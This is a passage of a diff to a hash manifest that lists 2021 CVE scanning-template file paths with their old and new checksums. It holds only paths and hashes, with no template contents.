-http/cves/2021/CVE-2021-24627.yaml:7b5065bcbfd84695005f75e016df51e8eac83355 -http/cves/2021/CVE-2021-24647.yaml:3e4b6c12cc8f4c46258d04d5949232b6e6c1aa2d -http/cves/2021/CVE-2021-24666.yaml:5259fdbf87f2b62debff24b623044689ddfe079a -http/cves/2021/CVE-2021-24731.yaml:2a79d18ac762fc65fa3adf424a2e09fc47bdabce -http/cves/2021/CVE-2021-24746.yaml:839b340c5fbe40999931dc232f596ecd1d8f6fb5 -http/cves/2021/CVE-2021-24750.yaml:9903d9366ad5372c4699515b3582959d6cd7b952 -http/cves/2021/CVE-2021-24762.yaml:8aa3cbf43e78db8a4a99bc1f8d1514e2770aea7c -http/cves/2021/CVE-2021-24791.yaml:a5a3981ffd24448676650b479229411c5c947c79 -http/cves/2021/CVE-2021-24827.yaml:875306362aa6fcf195b71d5f343187ec70814cd1 -http/cves/2021/CVE-2021-24838.yaml:5a656475638745ef1b2de82889f5913d6f0210ed -http/cves/2021/CVE-2021-24862.yaml:4516f122d2fa9262cf1f5f60617eb25e3a01e57e -http/cves/2021/CVE-2021-24875.yaml:47204d85655c246f05e1c6b4c39468a965ba6891 -http/cves/2021/CVE-2021-24891.yaml:c736912b503f7f6320cfa96ee6e4de6efa83da3f -http/cves/2021/CVE-2021-24910.yaml:80c25afdc908705992bb9183e2aa25b25c849e67 -http/cves/2021/CVE-2021-24915.yaml:603f612c3eae397376cd7d320d38462f1258efdf -http/cves/2021/CVE-2021-24917.yaml:3928c52c0aaf78a66f675c128b0f91706c96d205 -http/cves/2021/CVE-2021-24926.yaml:7f1f5d47cfab11609b20e33dde5abe996107cd21 -http/cves/2021/CVE-2021-24931.yaml:8f3767f72d39fd39dc1d00553e50aef5b173ecbd -http/cves/2021/CVE-2021-24940.yaml:6a0b9a81074c5aaef7bde2945bef45f10eb345f0 -http/cves/2021/CVE-2021-24946.yaml:3a4d4cfc34d5a511b33c1a76a2fe059541fe197d -http/cves/2021/CVE-2021-24947.yaml:022f22ea14f2f0676e1c07272af5aba03efa3053 -http/cves/2021/CVE-2021-24956.yaml:339cbac1db19465e0d25a4f90d2d55f944142c7f -http/cves/2021/CVE-2021-24970.yaml:17d42cbb1429b0f8777df3f0a0b6ca48398ae677 -http/cves/2021/CVE-2021-24979.yaml:b3aadea0c39cb6c5c9adf852d80b14fadef18f87 -http/cves/2021/CVE-2021-24987.yaml:edc39b6907ef2605474e34acf826a5933cdc4e56 -http/cves/2021/CVE-2021-24991.yaml:5393edba0ad37bf8970fbc6d7b9cfbc75f0c8ff6 -http/cves/2021/CVE-2021-24997.yaml:4a52f43bb591844303a7c0c52a9cdfba14c8d409 -http/cves/2021/CVE-2021-25003.yaml:4f4915a8ee421277034e17a138735dc318cabb88 -http/cves/2021/CVE-2021-25008.yaml:0bcea48bde1d68ec28fe67e30aa9a822912dbf28 -http/cves/2021/CVE-2021-25016.yaml:7e6ea783ce308443aa84ccd061dba0c7bbba2924 -http/cves/2021/CVE-2021-25028.yaml:d38dc672567ec95b3f2b5a0b797fd28b8a2d7f20 -http/cves/2021/CVE-2021-25033.yaml:e98b580977a1ba5d136b8aae82c888df2a894bf0 -http/cves/2021/CVE-2021-25052.yaml:472fbaadf0893f43ee8d43e85d2f46e476cb14a3 -http/cves/2021/CVE-2021-25055.yaml:e175d4f0d823e26721658f02a5e7c631176759d5 -http/cves/2021/CVE-2021-25063.yaml:46d6ad0bae440df431e4b56aca9d5a121465fd38 -http/cves/2021/CVE-2021-25065.yaml:f1b6f736537f9a72bde2384f1443c4ab0084a019 -http/cves/2021/CVE-2021-25067.yaml:75ca54639de2967279e5d07f4c03a0c3a2e85b29 -http/cves/2021/CVE-2021-25074.yaml:86f902ef7c1de43d539acdfb2bf4202bc5c174a2 -http/cves/2021/CVE-2021-25075.yaml:8fe74a43dacf914de021566e32d1ff9d5c80dbbe -http/cves/2021/CVE-2021-25078.yaml:96110cdcff53f96034547350353ece5e532daa45 -http/cves/2021/CVE-2021-25079.yaml:4a02cdd982df5d456ee61eb20c5335b6abf5ca1e -http/cves/2021/CVE-2021-25085.yaml:7fa0788163417bfeb1e50ccddda7b65d086975d8 -http/cves/2021/CVE-2021-25099.yaml:2b30cfde9c767777a7a4c3ef5ae75ece7a80e511 -http/cves/2021/CVE-2021-25104.yaml:d1cc1f795861da1c6cc3cd01ba821872415926a3 -http/cves/2021/CVE-2021-25111.yaml:848d9347a70528a3fc32d615a77956d8b32d6af6 -http/cves/2021/CVE-2021-25112.yaml:86708e57fa5acc7317cccbcf530321fa99e523ce -http/cves/2021/CVE-2021-25114.yaml:72f4bb1561a3044b20f26b03c6cadcce25d8b820 -http/cves/2021/CVE-2021-25118.yaml:dd94e5add2c3609d89d5935cd275265abf830bbe -http/cves/2021/CVE-2021-25120.yaml:6fb8f734b891e2d87809b58ea7fe1807476385bc -http/cves/2021/CVE-2021-25281.yaml:c57d9151cb6b073b60dc8a74f61c519550febd68 -http/cves/2021/CVE-2021-25296.yaml:3cc0966b94e1cb03c8e2208d1754c64c70133023 -http/cves/2021/CVE-2021-25297.yaml:1fdf0e532f562b3871fba445ad18063eecd8e341 -http/cves/2021/CVE-2021-25298.yaml:ff078e6641ae4db0cd2f715fdc6aa45e109ce1dc -http/cves/2021/CVE-2021-25299.yaml:b4f77988458464c9c989150e8eadfb956688293f -http/cves/2021/CVE-2021-25646.yaml:613615510e1352579448b531549c6b24701a4df7 +http/cves/2021/CVE-2021-24351.yaml:17310e2230da6aac2bd3c8e6e1e6822574ed1b26 +http/cves/2021/CVE-2021-24358.yaml:3b58f59ac87c57fff3290f11cdc7dfcf96a634ec +http/cves/2021/CVE-2021-24364.yaml:2fc659d6b4f4ba4593ee4f8d4d2e7b8f485808ee +http/cves/2021/CVE-2021-24370.yaml:c538977ced40e6fe48e4299adfa2a40136a55809 +http/cves/2021/CVE-2021-24387.yaml:df31e52c7fa97e34e70035dd43387d15ff0ed96e +http/cves/2021/CVE-2021-24389.yaml:27ac5481efeb4137349f5f3eeb7ed8c81fca7989 +http/cves/2021/CVE-2021-24406.yaml:364f1f8c4b3252b23bbb22e0c48e3cb526e954fb +http/cves/2021/CVE-2021-24407.yaml:db470e934c5f54813e461bfe9528c257774703b9 +http/cves/2021/CVE-2021-24409.yaml:6cd86e494afdb2ee949801799f011926289d4a90 +http/cves/2021/CVE-2021-24435.yaml:727729dd741127e59c7ef7242cdf44ee46eb1efb +http/cves/2021/CVE-2021-24436.yaml:3dbdacdac18e8c1ca6cabc19293cdd774fccf44c +http/cves/2021/CVE-2021-24452.yaml:573dbab25d9cfa89d6d4c5f1f9720a5644c7aba8 +http/cves/2021/CVE-2021-24472.yaml:0a2219d6ac7370894ef0b6a76c0b3cae22a2653b +http/cves/2021/CVE-2021-24488.yaml:74ed4da4f5a60d0136532a4c9e9791ee77fa85b7 +http/cves/2021/CVE-2021-24495.yaml:924c887b3969d3c361d853b896f46d6085354edc +http/cves/2021/CVE-2021-24498.yaml:4969c434e01895f758825db79dce3d4f2908a517 +http/cves/2021/CVE-2021-24499.yaml:678972d3ec8c8aadbb392555d928e6fde435d51e +http/cves/2021/CVE-2021-24510.yaml:1b916a41f039fe52af4ad240de5d5e382e7d1a38 +http/cves/2021/CVE-2021-24554.yaml:376dde911636821148706b6893a895f846ed54e6 +http/cves/2021/CVE-2021-24627.yaml:51d6c6d09c4ce2cae6f41fefb6449c61fdc4eec8 +http/cves/2021/CVE-2021-24647.yaml:7869ddfc584346f2955c58680c3e516dc469d587 +http/cves/2021/CVE-2021-24666.yaml:bbc545eea1af1288bf05a57c2bf6e4df5c8af734 +http/cves/2021/CVE-2021-24731.yaml:e50333cf9bade7298e06a8ecbca3fdcb4965fe6f +http/cves/2021/CVE-2021-24746.yaml:4e07756cd9d983f1e8d2c9ddcac983888e7a0521 +http/cves/2021/CVE-2021-24750.yaml:0db7a65d5618a62f1484b2fd153a85737b08f1e4 +http/cves/2021/CVE-2021-24762.yaml:77a96bd8dcd200808b52124ce44fae6a4ab54a64 +http/cves/2021/CVE-2021-24791.yaml:f7bbfc0dd0e962f3307ad1b44f16c4199787560d +http/cves/2021/CVE-2021-24827.yaml:8e7471a3c4ab70875e7e9bca6c5669442769788c +http/cves/2021/CVE-2021-24838.yaml:73410a39b514f6004956ced36ca1a74d8352992a +http/cves/2021/CVE-2021-24862.yaml:6c53f2f3a33622cedadddd7ca2c39e87d040874f +http/cves/2021/CVE-2021-24875.yaml:ebba2fbdd335eeac25815fbea87092d0ad9bd877 +http/cves/2021/CVE-2021-24891.yaml:a8a03df8bfe60dbb11de337499ff3b61665be5c9 +http/cves/2021/CVE-2021-24910.yaml:40f03c736a2020dec28d20c671e5aaee1cc47cec +http/cves/2021/CVE-2021-24915.yaml:c6c191d8affb1dc9106d89c61e8c431b18c2e98d +http/cves/2021/CVE-2021-24917.yaml:92bac27f6825a23ca75a1dacfdd20c46d92da100 +http/cves/2021/CVE-2021-24926.yaml:96da0b0f5df76729e1538bde24eab2210b7d7166 +http/cves/2021/CVE-2021-24931.yaml:ecc3d75c033d7896b4c131078fa060abf0aa07d3 +http/cves/2021/CVE-2021-24940.yaml:db5abf0cac709bf8f08549601fc71f72a918cd11 +http/cves/2021/CVE-2021-24946.yaml:16057564136fea656c6faa989cf105c8b22c5572 +http/cves/2021/CVE-2021-24947.yaml:b2f4b250f603a9c98d05645b832bf923e59aa796 +http/cves/2021/CVE-2021-24956.yaml:caad2bdd51ec676d12f96d43159aa07079b8fac1 +http/cves/2021/CVE-2021-24970.yaml:293f930d5effc6087fa0cb7d8dbc95f4c511fdea +http/cves/2021/CVE-2021-24979.yaml:79a69f515c360d9f996273b45e4d383e63c9244c +http/cves/2021/CVE-2021-24987.yaml:000eac28bab4ee9cee80d8ced3e9af145f603f9f +http/cves/2021/CVE-2021-24991.yaml:55232ac01861179e1587352d0a915051aeffe8fd +http/cves/2021/CVE-2021-24997.yaml:fdc19eaca928ec2e7001680170bbe7f67867bd71 +http/cves/2021/CVE-2021-25003.yaml:e39bc29489a78b8183f9392e2846703fb1c61959 +http/cves/2021/CVE-2021-25008.yaml:5ae21d798b100e5faa91a343be40ace0c288c5ae +http/cves/2021/CVE-2021-25016.yaml:3cba02b3d05999556676e1e568d2141d04bbdc2e +http/cves/2021/CVE-2021-25028.yaml:a0d8a90d3ca069ff1e0de58c1609b481ca6f1d9b +http/cves/2021/CVE-2021-25033.yaml:d633dca95b3099477d9c73e0aa8087e205915025 +http/cves/2021/CVE-2021-25052.yaml:e07384514a47d4c05e8b9af9bcc4478df8ba7623 +http/cves/2021/CVE-2021-25055.yaml:40678778f6f957bcd24bee33d77cb450c049b421 +http/cves/2021/CVE-2021-25063.yaml:571b61d0c8f4e78894a1a728670dfdb9afaf0c72 +http/cves/2021/CVE-2021-25065.yaml:3bcfbc97666f62d50e98b5f406f7b34eb243aede +http/cves/2021/CVE-2021-25067.yaml:b6302c74eacec367f1bc2c348db1ed47ba8b6e51 +http/cves/2021/CVE-2021-25074.yaml:2810541d88d2adb33b05a8811bccbb89a9a24e4c +http/cves/2021/CVE-2021-25075.yaml:39632d1d7805f882bb626f90c53bf2cbaf6e8f7c +http/cves/2021/CVE-2021-25078.yaml:9a2f7a74ad22ef62d54296eb01d1e06c1186a361 +http/cves/2021/CVE-2021-25079.yaml:8c4ca1e79b070f715dcf31dcf29474bd517f3218 +http/cves/2021/CVE-2021-25085.yaml:08b81a6f8efb74242255c3e74c6fc8f570053331 +http/cves/2021/CVE-2021-25099.yaml:42d5d34859f06fc06d79dbb0ce88d77b3bb06cff +http/cves/2021/CVE-2021-25104.yaml:15d80d2935307da7cda4ebbb6f4ab407bd401972 +http/cves/2021/CVE-2021-25111.yaml:cd25bb6485f50ecd8a4a6b42be44fc33ddd03759 +http/cves/2021/CVE-2021-25112.yaml:2cbb42e2e6c27648739a3a2a6dffd545996b4137 +http/cves/2021/CVE-2021-25114.yaml:0e3870dfa563219714709de9e329586143704b86 +http/cves/2021/CVE-2021-25118.yaml:144cdb17d649a5daaa7eb0c1e318ca0277e3b39f +http/cves/2021/CVE-2021-25120.yaml:424235940fdc34646f5734d3f1a3a5ef3ce1a7f7 +http/cves/2021/CVE-2021-25281.yaml:4705169b0d2880b2383a4505847649a43ef56331 +http/cves/2021/CVE-2021-25296.yaml:5c43370dff8c9cea23c055401c5c0a62e1046e8e +http/cves/2021/CVE-2021-25297.yaml:aca3bda6876c13d913766b52b9d1d7408026c61e +http/cves/2021/CVE-2021-25298.yaml:0f4a03bb96969f77581e3d2ca62aed75fe9cfe2f +http/cves/2021/CVE-2021-25299.yaml:41ed79f83373c0d60378f8bf55c53b9939f4477f +http/cves/2021/CVE-2021-25646.yaml:e090848669aee8155e3f2b582907009450d787ff http/cves/2021/CVE-2021-25864.yaml:5bf12f48d4f1cf9b4ae1a8f12b2b233b8e7cc408 -http/cves/2021/CVE-2021-25899.yaml:02932a44e1aeb4e24ec75fba31ce4af0a0082aeb +http/cves/2021/CVE-2021-25899.yaml:2170a281dd90dc11b8ee2011c24627c88d3fbd8f http/cves/2021/CVE-2021-26084.yaml:a1fec58cd8b28e1be049da601d47bdd04c18870d http/cves/2021/CVE-2021-26085.yaml:9a53f10427ecdca46370e1cde02a230873c2c1b1 -http/cves/2021/CVE-2021-26086.yaml:e5dc1caee39c780a5f10813b3b8cb235da31599c -http/cves/2021/CVE-2021-26247.yaml:44a4965c74f781a052badf59ba02b5320d3f501a -http/cves/2021/CVE-2021-26295.yaml:21b08d1a07535b22a03e10713fe4fa8b1e026863 -http/cves/2021/CVE-2021-26475.yaml:e4c2c7a374b903acf52c595082657d2632cf9086 -http/cves/2021/CVE-2021-26598.yaml:ce4b83d05ec62f1c6dd7684a50c6aa9456d136e1 -http/cves/2021/CVE-2021-26702.yaml:20f1c563198d83579a3be3b60fa8e34f2a5cc5a0 -http/cves/2021/CVE-2021-26710.yaml:23061404b806327fdaa85b6e6801bd8b606cef32 -http/cves/2021/CVE-2021-26723.yaml:5a751546dce0c11affbf5c2a38f3bc833d52ea27 -http/cves/2021/CVE-2021-26812.yaml:58201089adfb8937582aedbe7178d1d5c78b9431 -http/cves/2021/CVE-2021-26855.yaml:92ef5ee68ea93a10f9c89e0365d81d5d0be07a91 -http/cves/2021/CVE-2021-27124.yaml:6b2738cfebf2fc7c65b0e5548d08a42eb1271a42 -http/cves/2021/CVE-2021-27132.yaml:b295524393a9e923742c8e5a5878f9769cc53024 -http/cves/2021/CVE-2021-27309.yaml:98012b074a3599f4a64a88ddc8b796ade2bbd82a -http/cves/2021/CVE-2021-27310.yaml:15c88e997640b9e1e2f278e1d0abcfc2a8c647d9 -http/cves/2021/CVE-2021-27314.yaml:96b8f0af3d841981f92954dd995adcfe0e6828f0 -http/cves/2021/CVE-2021-27315.yaml:af72afd6c2d5ff44e35ea8ac167448b9fa2c10e4 -http/cves/2021/CVE-2021-27316.yaml:71b45283f62eab6e4a525f4f0e37c28b82804251 -http/cves/2021/CVE-2021-27319.yaml:9ae6eb6be6c6dff95368b7e2859c776489f4504b -http/cves/2021/CVE-2021-27320.yaml:249c9ee19289ea36a0e14f90f22ad759b0e016e9 -http/cves/2021/CVE-2021-27330.yaml:e9a322601c006a98ef8748c368bc58d2fb02a237 -http/cves/2021/CVE-2021-27358.yaml:b1fd133075f017bc80b2181ba5d74d8bfee9d483 -http/cves/2021/CVE-2021-27519.yaml:3cbed77cd5cd1720ff8b7d3f532dc0289100a311 -http/cves/2021/CVE-2021-27520.yaml:7f8e7aa9703c054c0f366ec01aa51e9c25af52fa +http/cves/2021/CVE-2021-26086.yaml:ffc9b5eb65110efb03ec4f05754e7badb5990f13 +http/cves/2021/CVE-2021-26247.yaml:8e15c2907e6471a16f4f4a3311d922984426963c +http/cves/2021/CVE-2021-26295.yaml:e15e84a8dd788c95cf3e8fe05439dabefcd415e8 +http/cves/2021/CVE-2021-26475.yaml:82f162a1f2ebe21c6b7eb930ff181c5f27c92ac4 +http/cves/2021/CVE-2021-26598.yaml:00a337565f5b84a204e05b3dc664bfffc37c5380 +http/cves/2021/CVE-2021-26702.yaml:c1eaf501c57dabb3d9a9852369ff3d788294033a +http/cves/2021/CVE-2021-26710.yaml:136689e8ed17d66ef0f3ff8c49e1d053e803d3a3 +http/cves/2021/CVE-2021-26723.yaml:1d15798bbcd3cd66e809d5e9da31986bf6679366 +http/cves/2021/CVE-2021-26812.yaml:fd874f30bfd4dcde0e544974c6598c0a06ccc795 +http/cves/2021/CVE-2021-26855.yaml:78eca74f273f2664b0bf7092e0667421e20330dc +http/cves/2021/CVE-2021-27124.yaml:612993493b7f66df3a4fc552c259fdf2857d744f +http/cves/2021/CVE-2021-27132.yaml:5edf17a8c5a9d8f6ef11b1a19079bd602840b848 +http/cves/2021/CVE-2021-27309.yaml:a4a52c26fcb571fa57d4b91e6ad370964026d6ea +http/cves/2021/CVE-2021-27310.yaml:5eb1eb3e687e556d9b97b653905084ab4880c158 +http/cves/2021/CVE-2021-27314.yaml:5fdfdbeeceb2218c74668db86ec15cd131822704 +http/cves/2021/CVE-2021-27315.yaml:263897f505f6b17d431050e138d87053a975d93c +http/cves/2021/CVE-2021-27316.yaml:976b4fe7e314c4249bcbe1114f3f74d626c11f44 +http/cves/2021/CVE-2021-27319.yaml:50a0f759c113cc0eebcfae63d06bd976e2312523 +http/cves/2021/CVE-2021-27320.yaml:f3cd6f0ff36eb2851c20a954393d105b1737e71e +http/cves/2021/CVE-2021-27330.yaml:20dcce4c092fe217a550de0c8c45e07aedc0d0e1 +http/cves/2021/CVE-2021-27358.yaml:8d11615ecadccdf355f01bb99d9c8a9f1dfb7bc8 +http/cves/2021/CVE-2021-27519.yaml:ec288fbd02e338789b0722dd803f60f8596106f0 +http/cves/2021/CVE-2021-27520.yaml:e477893b2e8cc4330cf6bab2ac7bbff95a046f9c http/cves/2021/CVE-2021-27561.yaml:2b5aa2c7bfb7b68aa194d34acb15d5f7f40a0d05 -http/cves/2021/CVE-2021-27651.yaml:0360c550d46ed7a7b4d6f8daa9ae209f98ccebd0 -http/cves/2021/CVE-2021-27670.yaml:13c7fc1058d4107bb77f167222d816b9d41efb9a +http/cves/2021/CVE-2021-27651.yaml:83cf923e19a6e8ef92c70b81b06017e81378e74d +http/cves/2021/CVE-2021-27670.yaml:5aa5508c7d1416c3dc758f21bf78e12883bae6fa http/cves/2021/CVE-2021-27748.yaml:eba210d13902f5a60cff6a0fcabef2449a30459c -http/cves/2021/CVE-2021-27850.yaml:1807533a148c6bf99c70ab274e07e8ed27e6d175 +http/cves/2021/CVE-2021-27850.yaml:0b1bd72879c6e53c1558b667b775ae9e1797f09a http/cves/2021/CVE-2021-27905.yaml:0874f175407217b5076a723ee87ee946b68421aa -http/cves/2021/CVE-2021-27909.yaml:404885bd83d5f50ad99d27b14dbd83702513bcaa -http/cves/2021/CVE-2021-27931.yaml:46fc043bc1290e2191caac8d194d387ae9287a93 +http/cves/2021/CVE-2021-27909.yaml:d1c3a7dc7c3a68486d265c56e3a30ba524b7b4ac +http/cves/2021/CVE-2021-27931.yaml:5165c6563b7cdd73be24e9fe89170756452bb659 http/cves/2021/CVE-2021-28073.yaml:3708c1b88bb493d026117d61d8a0aa9fb020c5a6 -http/cves/2021/CVE-2021-28149.yaml:9fdec04ee4008ad7267fa9819812e09714482983 -http/cves/2021/CVE-2021-28150.yaml:da3d4043e1672dad79fdfe30906c7b538357219b -http/cves/2021/CVE-2021-28151.yaml:e6eff553fd3e118483197aea62c1210a4a4b090a -http/cves/2021/CVE-2021-28164.yaml:b69ee8ddc4fc7b1c342b7b46da34a1ea16fe944b -http/cves/2021/CVE-2021-28169.yaml:bbffb69d0dfb57b5bfa17b47fd8d86f1b56e4f43 -http/cves/2021/CVE-2021-28377.yaml:f25348995fc38cec6b3e2fef90e2dd29df203cc0 -http/cves/2021/CVE-2021-28419.yaml:daff190a2bf6d7471aa2311cad4a507737a8981e +http/cves/2021/CVE-2021-28149.yaml:d99370866406aa13af15d6cd5c2dfa22eab77fda +http/cves/2021/CVE-2021-28150.yaml:6c55b9db003ef4efda1ece0248d87ded89724fbd +http/cves/2021/CVE-2021-28151.yaml:b2497a73d3260b5e01a45c617b8a54dcfadcfabe +http/cves/2021/CVE-2021-28164.yaml:79f68f2e552e607e65b95fae9bf79f74b44d448e +http/cves/2021/CVE-2021-28169.yaml:e3ace6a298cb4a80f15f7c54b4ecaa87d89d8cf5 +http/cves/2021/CVE-2021-28377.yaml:f4b7eddb240fe5fc52e89857a0aba80bedf017d9 +http/cves/2021/CVE-2021-28419.yaml:99fbcc7e997a91cff76448700afb180cd8a24e2d http/cves/2021/CVE-2021-28854.yaml:f642fff6999a311047096aeda3bd595410be28be -http/cves/2021/CVE-2021-28918.yaml:3fb57b777c1b0bad1c1e314a93c6519a59301ae7 -http/cves/2021/CVE-2021-28937.yaml:5ad993544bc0b2692e8180ebb584f09512ddc569 -http/cves/2021/CVE-2021-29006.yaml:2c1c3a462ca56d508e80b22ad49ed5094732959b -http/cves/2021/CVE-2021-29156.yaml:038d5679f1b1391a5b8411b1dc109d2f7b87b246 -http/cves/2021/CVE-2021-29203.yaml:f3a37456bb3a447e1d9e46338feef9d01def3a02 -http/cves/2021/CVE-2021-29441.yaml:e96b2ab7a297a6667386b110dfaf3e32811e858e +http/cves/2021/CVE-2021-28918.yaml:da45c25d90038394b302b2025a56b2fcb3255121 +http/cves/2021/CVE-2021-28937.yaml:a589c953d30f12423d7a68a8690f9ce1c1e88e3a +http/cves/2021/CVE-2021-29006.yaml:9355ec31a0a8977508772f6acf31256520554e17 +http/cves/2021/CVE-2021-29156.yaml:527d11a3ae792ace35ccd1dce9e7dd97115fc65a +http/cves/2021/CVE-2021-29203.yaml:3aace40dfd3d0179f96fc65a0f1e9f6e235fedd6 +http/cves/2021/CVE-2021-29441.yaml:9e24a102b41bb061b1734fd7e9dc6e539fe21060 http/cves/2021/CVE-2021-29442.yaml:5c69dd6497eeed3e367c3146a23e77abd3171c61 -http/cves/2021/CVE-2021-29484.yaml:93ab60708ae49ce3cf4ee6dcadbe2815c36d2431 -http/cves/2021/CVE-2021-29490.yaml:20bfe9454dc2af56713b6ea4a882bdf043273f99 -http/cves/2021/CVE-2021-29505.yaml:c1a6e79a34049480df463f8ff05e73175a394d36 -http/cves/2021/CVE-2021-29622.yaml:56dba19962f4a8c3453f3bd74391aa4bfe4e2651 -http/cves/2021/CVE-2021-29625.yaml:b62f5c7db980dcdf0e530d3461066edd253f7c76 -http/cves/2021/CVE-2021-3002.yaml:5278b670c78aa256f0a65913d3d28c00c7c98999 -http/cves/2021/CVE-2021-30049.yaml:29952f705af83a8b844d611856de1975d329472c -http/cves/2021/CVE-2021-30128.yaml:8ef76db6ef907e7e726558b270b45a17df298526 -http/cves/2021/CVE-2021-30134.yaml:fbbbf1df617cc340dc652aa75935c1256ce0e35e -http/cves/2021/CVE-2021-30151.yaml:ff375d645b6cb379732f805eae624019aeca8f6a -http/cves/2021/CVE-2021-3017.yaml:f4be04c9e46e7fb65d725bf695cb6de9a289adf5 -http/cves/2021/CVE-2021-30175.yaml:f7c08273f70758ea2a0e6c37bb66b92956aed716 -http/cves/2021/CVE-2021-3019.yaml:cc830bee32ffa89ebd29fbeaa71d9c4be817f956 -http/cves/2021/CVE-2021-30213.yaml:db16524056b14992c74b55acc520f59638c43bd3 +http/cves/2021/CVE-2021-29484.yaml:68cdd69751275a7e72100fba1fe854965d801e46 +http/cves/2021/CVE-2021-29490.yaml:5404538e854ef74184749ecce6984632cbee9d37 +http/cves/2021/CVE-2021-29505.yaml:8b7ac2dcff41a33f0f3c0f1e2af24d4747b9807f +http/cves/2021/CVE-2021-29622.yaml:772b3d4f10ef53d1eb2dd20cf6b1c397b3dbd192 +http/cves/2021/CVE-2021-29625.yaml:cac4131c4f8a7362e38b627dadda21aca9bdf62e +http/cves/2021/CVE-2021-3002.yaml:153caf3c4f814340bcf4bda0dbb25d909b9de3df +http/cves/2021/CVE-2021-30049.yaml:0cdd1cc742f9d2b3135a6f5906fafaa52cd8d1d5 +http/cves/2021/CVE-2021-30128.yaml:83e4cfe474d7dcc93c6e95645ed2c84d2222d2dc +http/cves/2021/CVE-2021-30134.yaml:0e567ef1d8fc92c6c00a1c39a8bae8b4c88c3041 +http/cves/2021/CVE-2021-30151.yaml:7578616d2be94a40adf4ebd1d152a97054ee887f +http/cves/2021/CVE-2021-3017.yaml:7d5eca364cdaf4a65cb0cdac75453ad18e0e4567 +http/cves/2021/CVE-2021-30175.yaml:6e3affeb372668f683abcf52c74510f0080e88cd +http/cves/2021/CVE-2021-3019.yaml:62513be291954ff286600c0d608bf0ef86fa24c3 +http/cves/2021/CVE-2021-30213.yaml:d8e3d2fbd3d0ca9530e654b9a9bbf8c8203b7462 http/cves/2021/CVE-2021-30461.yaml:1a9046aa944c6a835c486e410a87cb55e22d0e8e http/cves/2021/CVE-2021-30497.yaml:ab4ea36a5fb1303ff42527300d0155c6e5c35129 -http/cves/2021/CVE-2021-3110.yaml:74bb809763bb3d70e72c04983e8f12fd5466b28b +http/cves/2021/CVE-2021-3110.yaml:535ae3e0f3121ccdcdc7b854cab172504e37d1af http/cves/2021/CVE-2021-31195.yaml:11a21e693b9339f435b12f89b6e7096807d355de -http/cves/2021/CVE-2021-31249.yaml:cfc60dcdb822c2be30cc7fcfde345631de503a24 +http/cves/2021/CVE-2021-31249.yaml:cdfd8d9cf66c92b411168f6dc47275ca6eb88c73 http/cves/2021/CVE-2021-31250.yaml:2f73c9897c5196c9878bcb7697ab97aaae7409ec http/cves/2021/CVE-2021-3129.yaml:9200ddc36020bce3e1f96dc2fbc7dca00e20d430 -http/cves/2021/CVE-2021-31537.yaml:b7e7880000640d88dd252c206da5cf51076a5f7f -http/cves/2021/CVE-2021-31581.yaml:e0344e657276ff6ae5abbfcf5e2d7a957c151401 -http/cves/2021/CVE-2021-31589.yaml:6cc9dbf89449e7748ed1003a7dc3b52c15954a72 -http/cves/2021/CVE-2021-31602.yaml:5fd8f95c969dbf0cd185f9fe7eb26630e8e30a18 -http/cves/2021/CVE-2021-31682.yaml:3b0da5a9885602295336bc7fd07ce388f381008e +http/cves/2021/CVE-2021-31537.yaml:ed680f1c2a29899a92f6039c0c84143cc7c97703 +http/cves/2021/CVE-2021-31581.yaml:af2fc1596d1d74cb813b778cd0fd8de011fbcae6 +http/cves/2021/CVE-2021-31589.yaml:cf2de4eb7cdc203d01043f23f1d17b5e222ed213 +http/cves/2021/CVE-2021-31602.yaml:31c0874883a0b8149bcf24d902b9cfa8eaedfabd +http/cves/2021/CVE-2021-31682.yaml:376ced45f697f2e56c932a4a63762b7d01f192bd http/cves/2021/CVE-2021-31755.yaml:58397c2f09e539a90e7cd7e80ff63ca2385fe07c -http/cves/2021/CVE-2021-31805.yaml:abf19f1945e926a87c03716e921382790740798f -http/cves/2021/CVE-2021-31856.yaml:ef4521a8db31910619ec11bd7424f3a72c1c48a6 -http/cves/2021/CVE-2021-31862.yaml:d56d076c17e5b5d8be68f4e3a3760cc39f6b3d15 -http/cves/2021/CVE-2021-32030.yaml:19446164e062aaf2c13f27725777b63225c76c0d -http/cves/2021/CVE-2021-32172.yaml:1105e09f330de4c808e43dbb703565bb925feb52 -http/cves/2021/CVE-2021-3223.yaml:49bfdf918579c3a3248b1c1f7a9550201fc26161 -http/cves/2021/CVE-2021-32305.yaml:0a6f4d0127c3a7b81aecafb344af11f38eb3a15b -http/cves/2021/CVE-2021-32618.yaml:04ad76101af2978946048ec4e1e7fb219bac996b +http/cves/2021/CVE-2021-31805.yaml:9342ca4f96a2c76a42077512775faf1053475e71 +http/cves/2021/CVE-2021-31856.yaml:364bd1d7611911b9e4f3e16b1aa73b5b90d79e48 +http/cves/2021/CVE-2021-31862.yaml:a76beedbacbd3a7378d5aed2f88e8108ea7d50d6 +http/cves/2021/CVE-2021-32030.yaml:e00e18293d0a2e772d282956a96081180a9b0a43 +http/cves/2021/CVE-2021-32172.yaml:788b4db0391358c758e00a077efd31299f6000f6 +http/cves/2021/CVE-2021-3223.yaml:2ed8861e90f48954f8885e73d8c2e172abccdabf +http/cves/2021/CVE-2021-32305.yaml:feae2674366f50357ab5468aed247592faa232fd +http/cves/2021/CVE-2021-32618.yaml:b50c8eb461a8c1ce9632ba8fb901c068674094b0 http/cves/2021/CVE-2021-32682.yaml:a28249c56b1874a5f590bbfb58318cf0560bd40a -http/cves/2021/CVE-2021-32789.yaml:a28dac7da5d15f2011122991fe01ea760f599dc8 -http/cves/2021/CVE-2021-32819.yaml:1b1e559128729bcea177ca3d7eb0eec1dd645279 -http/cves/2021/CVE-2021-32820.yaml:efe7644ab2de7068fe3cdbd2d92e65e46b1626b9 -http/cves/2021/CVE-2021-32853.yaml:a2bd17593cc678b9effb7dbae22a0de5ae963bac -http/cves/2021/CVE-2021-3293.yaml:3f291a55698a51cfa42f7885b9df35f08521bff8 -http/cves/2021/CVE-2021-3297.yaml:4196e9a08459efb80c70bf7650e8bbf22c439402 -http/cves/2021/CVE-2021-33044.yaml:ff361feaff54b02aba51fdecb8fb37c0ea85f178 -http/cves/2021/CVE-2021-33221.yaml:1a218a0f045c38837bc2e291da9204d10ffedec8 +http/cves/2021/CVE-2021-32789.yaml:f9e6507d667a9e71079e43d54caeb7350bb3c1a9 +http/cves/2021/CVE-2021-32819.yaml:b02b1e61cf93fac5a91582a4baced4a2bac9c7a1 +http/cves/2021/CVE-2021-32820.yaml:557fd2936ba969e93b011dc326117a2d3627b666 +http/cves/2021/CVE-2021-32853.yaml:19a69f330c504b6be02f4d41e7b36f7f436bc397 +http/cves/2021/CVE-2021-3293.yaml:40c3ff63e7608e2475afeffb67a7d28c457620f1 